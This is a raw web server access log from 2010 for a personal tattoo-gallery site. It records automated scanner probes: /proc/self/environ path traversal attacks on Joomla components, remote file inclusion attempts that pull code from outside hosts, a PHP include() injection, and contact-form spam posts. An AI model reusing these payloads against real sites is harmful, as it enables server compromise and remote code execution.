58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:10 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:25 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
81.31.149.80 - - [28/Jun/2010:23:13:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:23:13:26 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
58.179.124.211 - - [28/Jun/2010:23:13:26 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:26 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
81.31.149.80 - - [28/Jun/2010:23:13:26 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
58.179.124.211 - - [28/Jun/2010:23:13:26 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:26 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:26 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:26 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:27 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:27 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:27 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:29 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:42 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:43 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:44 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:44 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:44 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:54 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:55 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:55 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:55 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:14:06 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:14:06 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:14:06 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:14:06 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
91.121.64.99 - - [28/Jun/2010:23:14:07 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.64.99 - - [28/Jun/2010:23:14:07 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.64.99 - - [28/Jun/2010:23:14:07 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.31.149.80 - - [28/Jun/2010:23:14:55 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
91.121.64.99 - - [28/Jun/2010:23:15:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
93.186.192.124 - - [28/Jun/2010:23:15:22 -0500] "GET /logs/access_log.1274572800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.131.96.193 - - [28/Jun/2010:23:16:39 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:16:39 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:16:49 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:06 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:06 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:06 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:09 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:09 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:09 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:24 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:24 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:24 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:30 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:32 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:17:49 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.205.67.73 - - [28/Jun/2010:23:17:49 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
67.205.67.73 - - [28/Jun/2010:23:17:49 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
216.131.96.193 - - [28/Jun/2010:23:17:51 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.108.204.66 - - [28/Jun/2010:23:17:52 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://perez.livehomelucky.eu/100505/p2/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
216.131.96.193 - - [28/Jun/2010:23:18:29 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:18:30 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:18:30 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:19:24 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
213.171.37.206 - - [28/Jun/2010:23:19:27 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:19:27 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:23:19:27 -0500] "GET /logs/access_log.1277164800/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
87.118.96.160 - - [28/Jun/2010:23:19:45 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.160 - - [28/Jun/2010:23:19:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.160 - - [28/Jun/2010:23:19:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
93.186.192.124 - - [28/Jun/2010:23:19:57 -0500] "GET /logs/access_log.1274572800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.131.96.193 - - [28/Jun/2010:23:20:00 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:00 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:01 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:03 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:03 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:03 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:37 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:37 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:37 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:40 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:44 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:54 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:20:54 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:21:07 -0500] "GET /logs/access_log.1277164800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:21:07 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:21:07 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:21:10 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [28/Jun/2010:23:21:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
93.186.192.124 - - [28/Jun/2010:23:21:26 -0500] "GET /logs/access_log.1274572800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.204.227 - - [28/Jun/2010:23:21:57 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.137.233.6 - - [28/Jun/2010:23:23:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:15 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:17 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:23:23:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
